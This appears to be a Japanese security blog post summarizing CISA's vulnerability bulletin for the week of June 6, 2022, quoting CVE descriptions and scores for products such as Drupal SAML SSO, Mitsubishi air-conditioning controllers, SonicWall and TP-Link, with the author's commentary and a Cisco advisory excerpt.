Drupal SAML SP 2.0 Single Sign On (SSO) - SAML Service Provider の特定の非デフォルト設定に複数の脆弱性があり、悪意のあるユーザが選択した任意のユーザとしてログインすることが可能です。この脆弱性は、モジュールのデフォルト設定で、"Either sign SAML assertions" と "x509 certificate" のオプションが必要なことにより緩和されます(筆者注、SAMLアサーションのサインまたは、x509の証明書が、デフォルトでは必要なので、そうそう誰でもなりすましが可能な訳では無い、ということか)。この問題の影響は、次の通り。Drupal SAML SP 2.0 Single Sign On (SSO) - SAML Service Provider 8.x version 8.x-2.24 and prior versions; 7.x version 7.x-2.57 and prior versions.

※  SAMLとは、Security Assertion Markup Languageの略称であり、OASISによって策定された異なるインターネットドメイン間でユーザー認証を行うための XML をベースにした標準規格です。(Wikipedia)

NIST: NVD Base Score:  8.8 HIGH 


dynamicmarkt -- dynamicmarkt  3件, easyii_cms -- easyii_cms, eatan_cms -- eatan_cms


elastic -- elasticsearch

CVE-2022-23712
DoS脆弱性がある。

NIST: NVD Base Score:  7.5 HIGH 


emicklei -- go-restful, emlog_pro -- emlog_pro
envoy_proxy -- envoy  5件
everywhere_cms -- everywhere_cms, fex-team -- kity_minder, filerun -- afian_filerun, filezilla -- filezilla, firejail -- firejail, flatcore -- flatcore-cms, francoisjacquet -- rosariosis, francoisjacquet -- rosariosis, fudforum -- fudforum
gatsby -- gatsby, git-promise -- git-promise
gitlab -- ce/ee  3件
gitlab -- ee 3件
gitlab -- gitlab_ee
gitlab -- gitlab_runner
glpl-project -- glpl, gogs -- gogs, google -- android, gosecure-- phone_system, gosecure-- phone_system, gpac -- gpac, gradle_enterprise -- gradle_enterprise, grafana -- grafana, gunet -- open_eclass, guzzle -- guzzle 


h3c -- magic_r100_r100v100r005 

H3C Magic R100 R100V100R005 は、様々なモジュールの様々なパラメータにスタックオーバーフローの脆弱性がある。
既に17件全てに「9.8 Critical」が割り当てられている。

※ これも D-Link同様、Wi-Fiルータの脆弱性。近所にハッカーが住んでいたら、物理接触無し(Attack Vector = Network)で侵害可能ということ。 


hcl_software -- onetest_server


hitachi_energy -- txpert_hub_coretec

全三件で、既にSeverityが割り当てられている。High 1件、Medium 2件の内、スコア最高のものは以下の通り。
CVE-2021-35530
A vulnerability in the application authentication and authorization mechanism in Hitachi Energy's TXpert Hub CoreTec 4, that depends on a token validation of the session identifier, allows an unauthorized modified message to be executed in the server enabling an unauthorized actor to change an existing user password, and further gain authorized access into the system via login mechanism. This issue affects: Hitachi Energy TXpert Hub CoreTec 4 version 2.0.0 2.1.0; 2.1.0; 2.1.1; 2.1.2; 2.1.3; 2.2.0; 2.2.1.
NIST: NVD Base Score:  8.2 HIGH Vector:  CVSS:3.1 .. Attack Vector: Local .. Privileges Required: High
CNA:  Hitachi Energy Base Score:  6.0 MEDIUM 

日立エネルギーの「TXpert Hub CoreTec 4」のアプリケーション認証・認可機構には、セッション識別子のトークン検証に依存する脆弱性があり、サーバー内で不正に変更されたメッセージを実行することで、不正な行為者が既存のユーザーパスワードを変更し、さらにログイン機構を介してシステムに不正アクセスすることを可能にします。この問題の影響がある製品は、日立エネルギー TXpert Hub CoreTec 4 バージョン 2.0.0 2.1.0; 2.1.0; 2.1.1; 2.1.2; 2.1.3; 2.2.0; 2.2.1.

※ ビル管理事務所が狙われるのか。アタックベクターはローカル。目下猛暑である。レッドチーム等で攻める人は、水分補給にも留意されたい。


humhub -- humhub, ibm -- infosphere_information_server クリティカル 1件
ibm -- spectrum_copy_data_management  5件(High 1, Medium 3, Low 1)
ibm -- spectrum_protect_plus
ideaco.ir -- idealms
igel -- universal_management_suite  4件
ihb_eg_flexnow -- ihb_eg_flexnow, intelliants -- subrion_cms, istio -- istio, itarian -- endpoint_manage_communication_client, itarian -- saas/on-premise, itop_hub -- itop. jamf -- private_access, jgraph -- drawio
jizhicms -- jizhicms, jizhicms -- jizhicms, jodd_http -- jodd_http, joy_ebike -- joy_ebike, jupyter_hub -- oauthenticator
kromitgmbh -- titra, laravel -- laravel, lepin -- ep-kp001, libjpeg -- libjpeg
librehealth -- lh-ehr_base 数件

lighttpd -- lighttpd
linux -- kernel   4件(High 1, Low 1, NVD score not yet provided 2)
mechanize -- mechanize, mediatek -- apusys_driver, mediatek -- ccu, mediatek -- imgsensor
mediatek -- telephony  2件
mediatek -- wifi_firmware 2件
mediatek -- wlan_driver 7件
mediatek --android
minio -- minio, minmax -- minmax


mitsubishi -- multiple_products

CVE-2022-24296

Use of a Broken or Risky Cryptographic Algorithm vulnerability in the List1 below allows a remote unauthenticated attacker to cause a disclosure of encrypted message of the air conditioning systems by sniffing encrypted communications. 

  * List 1
Air Conditioning System G-150AD Ver. 3.21 and prior,
Air Conditioning System AG-150A-A Ver. 3.21 and prior,
Air Conditioning System AG-150A-J Ver. 3.21 and prior,
Air Conditioning System GB-50AD Ver. 3.21 and prior,
Air Conditioning System GB-50ADA-A Ver. 3.21 and prior,
Air Conditioning System GB-50ADA-J Ver. 3.21 and prior,
Air Conditioning System EB-50GU-A Ver. 7.10 and prior,
Air Conditioning System EB-50GU-J Ver. 7.10 and prior,
Air Conditioning System AE-200J Ver. 7.97 and prior,
Air Conditioning System AE-200A Ver. 7.97 and prior,
Air Conditioning System AE-200E Ver. 7.97 and prior,
Air Conditioning System AE-50J Ver. 7.97 and prior,
Air Conditioning System AE-50A Ver. 7.97 and prior,
Air Conditioning System AE-50E Ver. 7.97 and prior,
Air Conditioning System EW-50J Ver. 7.97 and prior,
Air Conditioning System EW-50A Ver. 7.97 and prior,
Air Conditioning System EW-50E Ver. 7.97 and prior,
Air Conditioning System TE-200A Ver. 7.97 and prior,
Air Conditioning System TE-50A Ver. 7.97 and prior and
Air Conditioning System TW-50A Ver. 7.97 and prior
上記「List 1」 の製品における『壊れた、或いはリスキーな暗号アルゴリズム』の脆弱性の使用は、遠隔地の認証されていない攻撃者が暗号通信を盗聴することによって, 空調システムの暗号メッセージを漏洩させることを可能にします。

NIST: NVD Base Score:  7.5 HIGH 

※ G-150ADの集中コントローラーは、こんな感じらしい(↓)

 引用サイト(リンク)


modzero -- klapp_app, monstaftp -- monstaftp, monyog_ultimate -- monyog_ultimate
nbnbk_cms -- nbnbk_cms, neorazorx -- facturascripts, next_generation_of_genealogy_sitebuilding -- next_generation_of_genealogy_sitebuilding
nocodb -- nocodb
open_edx -- open_edx, opswat -- metadefender_core, oracle -- multiple_products, owncloud -- core
partkeepr -- partkeepr
phplist -- phplist  8件
pjsip -- pjsip, platinum_mobile -- platinum_mobile, podman -- podman, publiccms -- publiccms, pyil -- pypl
razer -- sila_gaming_router, realnetworks -- real_player, realvnc -- vnc_server, redhat -- cri-o, riverbed -- appresponse
samsung_mobile -- find_my_mobile, samsung_mobile -- internet, samsung_mobile -- kies, samsung_mobile -- members, samsung_mobile -- my_files, samsung_mobile -- pass, samsung_mobile -- quick_share, samsung_mobile -- smart_things

sap -- sap_business_objects_business_intelligence_platform  

seeddms -- seeddms, semantic-release -- semantic-release, sevone -- network_management_system, sialweb_cms -- sialweb_cms, sicunet -- access_controller, silver_stripe -- silverstripe-ominpay, snyk -- jpeg-js, snyk -- posix, snyk -- metacalc, 


solare_datensysteme -- solar-log

全7件、内クリティカル一件。エネルギー管理の仕組みらしい。2017に発見されていたが、この度更新された情報である。

CVE-2017-20025

A vulnerability was found in Solare Solar-Log 2.8.4-56/3.5.2-85. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Flash Memory. The manipulation leads to privilege escalation. The attack can be launched remotely. Upgrading to version 3.5.3-86 is able to address this issue. It is recommended to upgrade the affected component.

Solare Solar-Log 2.8.4-56/3.5.2-85 に脆弱性が発見されました。この脆弱性は、Critical(重要)であると宣言されています。この脆弱性の影響を受けるのは、コンポーネントのフラッシュメモリの未知の機能です。この操作により、特権の昇格が可能となります。この脆弱性を利用した攻撃は、リモートで実行可能です。バージョン 3.5.3-86 にアップグレードすることで、この問題に対処できます。該当するコンポーネントをアップグレードすることを推奨します。

NIST: NVD Base Score:  9.8 CRITICAL
CNA:  VulDB Base Score:  7.3 HIGH 


sonicwall -- ssl-vpn_sma100    

CVE-2022-1703

Improper neutralization of special elements in the SonicWall SSL-VPN SMA100 series management interface allows a remote authenticated attacker to inject OS Commands which potentially leads to remote command execution vulnerability or denial of service (DoS) attack.

SonicWall SSL-VPN SMA100シリーズの管理インターフェースにおける特殊要素の不適切な無効化により、リモートで認証された攻撃者がOSコマンドを注入し、リモートコマンド実行脆弱性またはサービス拒否(DoS)攻撃につながる可能性があります。

NIST: NVD Base Score:  8.8 HIGH 


sourcecodester -- money_transfer_management_system


sourcecodester -- prison_management_system

全4件のうち、Highは以下を含む3件。

CVE-2022-2019

A vulnerability classified as critical was found in SourceCodester Prison Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /classes/Users.php?f=save of the component New User Creation. The manipulation leads to improper authorization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

SourceCodester Prison Management System 1.0に、Criticalに分類される脆弱性が発見されました。本脆弱性の影響を受けるのは、New User Creation コンポーネントの /classes/Users.php?f=save ファイルに存在する未知の機能です。この操作により、不適切な認証が行われます。この攻撃は、リモートで実行することができます。この脆弱性は一般に公開されており、利用される可能性があります。

NIST: NVD Base Score:  7.5 HIGH 


sourcecodester -- siple_task_scheduling_system, sricam -- ip_cctv_camera, stackoverflow -- jmespath.rb, tenable -- scorm_engive
thales_group -- safenet_keysecure, thedaylightstudio -- fuel_cms, tigera -- multiple_products, toaruos -- toaruos, tooljet -- tooljet, totolink --ex1200t


tp-linnk -- router_ax50 

CVE-2022-30075

In TP-Link Router AX50 firmware 210730 and older, import of a malicious backup file via web interface can lead to remote code execution due to improper validation.

TP-Link Router AX50 ファームウェア 210730 およびそれ以前のバージョンにおいて、Web インターフェース経由で不正なバックアップファイルをインポートすると、不適切な検証のためにリモートでコードが実行される可能性があります。

NIST: NVD Base Score:  8.8 HIGH 


trend_micro -- security_2021_and_2022

全2件(High 1件、Medium 1件)

うちHigh なのは次のCVE

CVE-2022-30703

Trend Micro Security 2021 and 2022 (Consumer) is vulnerable to an exposed dangerous method vulnerability that could allow an attacker to obtain access to leaked kernel addresses and disclose sensitive information. This vulnerability could also potentially be chained for privilege escalation.


trilogy - trilogy, tuleap -- tuleap
u-boot -- u-boot. uboot -- uboot
vapor -- vapor, verbatim -- multiple_products, vim -- vim, virtua_software -- cobranca, vyperlang -- vyper


watchguard -- multiple_products

CVE-2022-25361 

WatchGuard Firebox and XTM appliances allow an unauthenticated remote attacker to delete arbitrary files from a limited set of directories on the system. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2.

WatchGuard Firebox および XTM アプライアンスでは、認証されていないリモートの攻撃者が、システム上の限られたディレクトリのセットから任意のファイルを削除することができます。この脆弱性は、12.7.2_U2 以前の Fireware OS、12.1.3_U8 以前の 12.x および 12.2.x ~ 12.5.x 以前の 12.5.9_U2 に影響を及ぼします。

NIST: NVD Base Score:  9.1 CRITICAL 


wolfcms -- wolfcms, wolterskulwer -- teammate+_audit


wordpress plugin 関係

個々のプラグイン脆弱性は割愛する。随分前のことになるが、脆弱性と言えば IIS, FlashPlayer, Java が他を圧する件数で、三兄弟のようだった。下記リストから当時の空気感を思い出した。

これを見ると私なら「ワードプレスのプラグインを積極的に使っていきたい」とは考えないが(参考、以前の記事)、或いは出所のしっかりしたプラグインは大丈夫だったりするのか? その場合、さらに、同プラグインだけを許可し、他のプラグインは設定で使用できなくする事が果たして可能か?

ひとまず「プラグインを使わなければ一定の安全性が確保できる」との説があるが、果たしてそれで十分だろうか。多くの失敗事例が起きていることからも、「失敗事例が自分たちに起こりうるシナリオを想定した上で、それを予防ないしは早期発見する統制設計が可能か。その統制は現実的に機能するか。さらに、プラグイン以外の脆弱性は収束感があるか」など調査・検討が必要だろう。

 ・以下、問題のプラグイン一覧(当該週分のみ)

wordpress -- amtythumb_wordpress_plugin 
wordpress -- cp_image_store_with_slideshow_wordpress_plugin
wordpress -- cube_slider_wordpress_plugin
wordpress -- database_backup_for_wordpress_plugin
wordpress -- fibosearch_wordpress_plugin
wordpress -- files_download_delay_wordpress_plugin
wordpress -- five_minute_webshop_wordpress_plugin
wordpress -- five_minute_webshop_wordpress_plugin
wordpress -- formcraft_wordpress_plugin
wordpress -- livesync_for_wordpress_plugin
wordpress -- logo_slider_wordpress_plugin
wordpress -- multiple_plugins
wordpress -- note_press_wordpress_plugin
wordpress -- note_press_wordpress_plugin
wordpress -- note_press_wordpress_plugin
wordpress -- photo_gallery_by_10wev_wordpress_plugin
wordpress -- realty_workstation_wordpress_plugin
wordpress -- throws_spam_away_wordpress_plugin
wordpress -- user_meta_wordpress_plugin
wordpress -- video_slider_wordpress_plugin
wordpress -- woocommerce_green_wallet_gateway_wordpress_plugin
wordpress -- wp_born_babies_wordpress_plugin
wordpress -- wp_fundraising_donation_and_crowdfunding_platform_wordpress_plugin
wordpress -- wp_siple_adsense_insertion_wordpress_plugin
wordpress -- wp_statistics_wordpress_plugin
wordpress -- wpqa_builder_wordpress_plugin
wordpress -- wpqa_builder_wordpress_plugin


wpscan -- ask_me_wordpress_theme, wpscan -- discy_wordpress_theme
xampp -- xampp, xen_project -- xen


xiaomi -- xiaomi

CVE-2020-14125 

A denial of service vulnerability exists in some Xiaomi models of phones. The vulnerability is caused by out-of-bound read/write and can be exploited by attackers to make denial of service.

Xiaomiの一部機種の携帯電話には、サービス拒否の脆弱性が存在します。この脆弱性は、out-of-bound read/writeによって引き起こされ、攻撃者がサービス拒否を行うことが可能です。

NIST: NVD Base Score:  7.5 HIGH 


xxl-job -- xxl-job, zangband -- zangband-data, zeroshell -- zeroshell, zte -- mf297d, zyxel -- gs1200


あとがき

ここ1, 2週間、CISA発表をじっくり見ている。こんなに真面目に読むのは、実は何年ぶりかになる。以前に比べるとスマホ案件数の上昇の他に、エアコン・エネルギ管理システムや、モデムの件数上昇が目立ってきた気がする。

エアコン・ハックは今のところ直ちに内部機密の漏えいに繋がるようには見えず、むしろ従来は避けられたようなターゲットへの恐ろしいDoSが懸念される。例えば地域の市役所・病院など公共セクターに対する次の攻撃である。

  1. 機能停止とランサム請求によるマネタイズ
  2. 地域への侵攻時のハイブリッド戦による地域攪乱
今どきの世界情勢を踏まえれば、残念だが現実味のある話と言えるだろう。

また、ルータなどの通信機器の脆弱性については、件数増加に加えて、Severity=High以上の案件も散見されるようになった。これは、現実の侵入のイニシャルベクターとしても増えているのではないか。

通信機器選定にあたって、ベンダーサポートが充実している事が重要である。しかし廉価版では保守品質は低そうだ。ご家庭や小さな事務所ではログ監視はもちろん、ファームウェアアップデートさえも難しいだろうから、多少割高に見えても『ベンダー保守が充実しているもの』を選びたい(ルータレンタルと自動保守や交換のサービスが有ったら良さそうだ)。さらに『ログ監視を外注化』出来るとベターだろう。課題は「決裁者の理解を得られるか」に尽きる。

出典

Bulletin (SB22-164)
Vulnerability Summary for the Week of June 6, 2022


Jun 24, 2022

CVE-2022-20664: Cisco warns of security holes in its security appliances

Cisco warns of security holes in its security appliances (06/22)

Cisco has alerted customers to another four vulnerabilities in its products, including a high-severity flaw in its email and web security appliances. 

The networking giant has issued a patch for that bug, tracked as CVE-2022-20664. The flaw is present in the web management interface of Cisco's Secure Email and Web Manager and Email Security Appliance in both the virtual and hardware appliances. Some earlier versions of both products, we note, have reached end of life, and so the manufacturer won't release fixes; it instead told customers to migrate to a newer version and dump the old.

CVE-2022-20664 (06/15)

A vulnerability in the web management interface of Cisco Secure Email and Web Manager, formerly Cisco Security Management Appliance (SMA), and Cisco Email Security Appliance (ESA) could allow an authenticated, remote attacker to retrieve sensitive information from a Lightweight Directory Access Protocol (LDAP) external authentication server connected to an affected device. This vulnerability is due to a lack of proper input sanitization while querying the external authentication server. An attacker could exploit this vulnerability by sending a crafted query through an external authentication web page. A successful exploit could allow the attacker to gain access to sensitive information, including user credentials from the external authentication server. To exploit this vulnerability, an attacker would need valid operator-level (or higher) credentials.

NIST: NVD  Base Score:  N/A  NVD score not yet provided.

CNA:  Cisco Systems, Inc.  Base Score:  7.7 HIGH

Cisco Email Security Appliance and Cisco Secure Email and Web Manager Information Disclosure Vulnerability (06/15)

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

Affected Products

    Vulnerable Products

This vulnerability affects Cisco Secure Email and Web Manager and Cisco Email Security Appliance (ESA), both virtual and hardware appliances, if all of the following conditions are met:

  • They are running a vulnerable release of Cisco AsyncOS Software.
  • They are configured to use external authentication.
  • They are using LDAP as an authentication protocol.

    Note: External authentication is disabled by default.

Determine whether external authentication is enabled:

  1. Log in to the web management interface of Cisco Secure Email and Web Manager or Cisco ESA.
  2. Navigate to System Administration > Users > External Authentication > Enable External Authentication.
  3. If the green check mark is present, external authentication is enabled.

For information about which Cisco software releases are vulnerable, see the Fixed Software section of this advisory.